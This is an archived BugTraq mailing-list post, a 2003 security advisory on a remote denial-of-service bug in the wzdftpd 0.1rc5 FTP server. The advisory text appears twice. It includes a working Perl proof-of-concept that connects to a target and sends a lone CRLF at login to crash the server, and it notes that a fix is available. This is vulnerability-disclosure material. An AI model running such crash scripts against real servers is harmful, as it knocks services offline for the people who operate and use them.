SecurityFocus BUGTRAQ Mailing List: BugTraqLink Number One Link Number One Link Number Two Link Number Two Link Number One Link Number One Link Number Two Link Number Two Entire Site Advisories Calendar Columnists Elsewhere Guest Feature Infocus Library Links Mailing Lists (all) -- BUGTRAQ -- FOCUS-IDS -- FOCUS-IH -- FOCUS-LINUX -- FOCUS-MS -- FOCUS-SUN -- FOCUS-VIRUS -- FORENSICS -- INCIDENTS -- PEN-TEST -- SEC JOBS -- SF NEWS -- VULN-DEV News Products Services Tools Vulns BUGTRAQ ARCHIVE [ Message Index ] [ Thread Index ][ Reply ] [ prev Msg by Date ][ next Msg by Date ] To: BugTraq Subject: Moozatech: WZFTPD Denial Of Service Date: Sep 23 2003 3:33PM Author: Moran Zavdi Message-ID: 23/09/03 Moozatech Advisory http://www.moozatech.com/mt-23-09-2003.txt ------------------------------------------------------- Application: wzdftpd FTP Server Web Site: http://www.wzdftpd.net Versions: 0.1rc5 Platform: Windows 2000,WindowsXP,UNIX systems might also be affected. Risk: Remote DOS. Severity: Medium Fix Available: Yes ------------------------------------------------------- 1) Introduction 2) Bug 3) The Code 4) Fix 5) About Moozatech 6) Disclaimer 7) FeedBack =============== 1) Introduction =============== wzdftpd is a ftp server designed to be modular, work under linux/win32/freebsd/openbsd, and to be entirely configurable online using SITE commands. ====== 2) Bug ====== wzdftpd has an internal check during the login process to verify the input. however, sending a single CRLF sequence at login will cause an Unhandled exception at the server. ==================== 3) Proof of concept. ==================== #!/usr/bin/perl # # #################################### # # Proof of concept for # # # WZDFTPD FTP Server version 0.1rc5 # # #################################### # # http://www.moozatech.com/mt-23-09-2003.txt # # Usage: perl mooza1.pl [host] [port] use IO::Socket; $host = $ARGV[0]; $port = $ARGV[1]; print "\n#####################################\n\n"; print "Proof-Of-Concept for wzdftpd v0.1rc5.\n"; print "this code is for demonstration only.\n"; print "Use it under your own responsebility.\n"; print "\n#####################################\n\n"; if (defined $host && defined $port ) { } else { print "Oops, Something is missing.\n"; die "Usage: perl mooza1.pl [host] [port]\n"; } print "Connecting to $host:$port... "; $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type=> SOCK_STREAM) or die "Failed, Cant connect?\n"; print "OK\n"; sleep 1; print "Sending Dos..\n"; sleep 2; print $socket "\r\n"; $socket->autoflush(1); sleep 2; print "we are done here..\n\n"; close($socket); ====== 4) Fix ====== the author has confirmed this bug as critical and issued a fix at the CVS version and its also availble on the daily version. ================== 5) About Moozatech ================== Moozatech IT Systems Ltd. (?Moozatech?) is a leading information security consulting and project management firm focused on developing "Secure IT Solutions" which best suit the client's operational needs. Moozatech devotes time to make a secure computing environment for customers. ============= 6) Disclaimer ============= The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. ============= 7) FeedBack ============= Please send suggestions, updates, and comments to: Security moozatech com http://www.moozatech.com ----- Moran Zavdi Moozatech IT Systems www.moozatech.com 23/09/03 Moozatech Advisory http://www.moozatech.com/mt-23-09-2003.txt ------------------------------------------------------- Application: wzdftpd FTP Server Web Site: http://www.wzdftpd.net Versions: 0.1rc5 Platform: Windows 2000,WindowsXP,UNIX systems might also be affected. Risk: Remote DOS. Severity: Medium Fix Available: Yes ------------------------------------------------------- 1) Introduction 2) Bug 3) The Code 4) Fix 5) About Moozatech 6) Disclaimer 7) FeedBack =============== 1) Introduction =============== wzdftpd is a ftp server designed to be modular, work under linux/win32/freebsd/openbsd, and to be entirely configurable online using SITE commands. ====== 2) Bug ====== wzdftpd has an internal check during the login process to verify the input. however, sending a single CRLF sequence at login will cause an Unhandled exception at the server. ==================== 3) Proof of concept. ==================== #!/usr/bin/perl # # #################################### # # Proof of concept for # # # WZDFTPD FTP Server version 0.1rc5 # # #################################### # # http://www.moozatech.com/mt-23-09-2003.txt # # Usage: perl mooza1.pl [host] [port] use IO::Socket; $host = $ARGV[0]; $port = $ARGV[1]; print "\n#####################################\n\n"; print "Proof-Of-Concept for wzdftpd v0.1rc5.\n"; print "this code is for demonstration only.\n"; print "Use it under your own responsebility.\n"; print "\n#####################################\n\n"; if (defined $host && defined $port ) { } else { print "Oops, Something is missing.\n"; die "Usage: perl mooza1.pl [host] [port]\n"; } print "Connecting to $host:$port... "; $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type=> SOCK_STREAM) or die "Failed, Cant connect?\n"; print "OK\n"; sleep 1; print "Sending Dos..\n"; sleep 2; print $socket "\r\n"; $socket->autoflush(1); sleep 2; print "we are done here..\n\n"; close($socket); ====== 4) Fix ====== the author has confirmed this bug as critical and issued a fix at the CVS version and its also availble on the daily version. ================== 5) About Moozatech ================== Moozatech IT Systems Ltd. (“Moozatech”) is a leading information security consulting and project management firm focused on developing "Secure IT Solutions" which best suit the client's operational needs. Moozatech devotes time to make a secure computing environment for customers. ============= 6) Disclaimer ============= The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties with regard to this information. In no event shall the author be liable for any damages whatsoever arising out of or in connection with the use or spread of this information. Any use of this information is at the user's own risk. ============= 7) FeedBack ============= Please send suggestions, updates, and comments to: Security moozatech com http://www.moozatech.com Want to link to this message? Use this URL: Disclaimer, Terms & Conditions About this List Featured Lists: ARIS Users bugtraq bugtraq-es bugtraq-french NEW bugtraq-jp firewalls focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics forensics-es honeypots incidents libnet pen-test secevents secpapers secprog sectools secureshell security-basics security-management NEW securityjobs vpn vuln-dev webappsec Newsletters: sf-news ms-secnews linux-secnews [ more . . . ] Privacy Statement Copyright © 1999-2003 SecurityFocus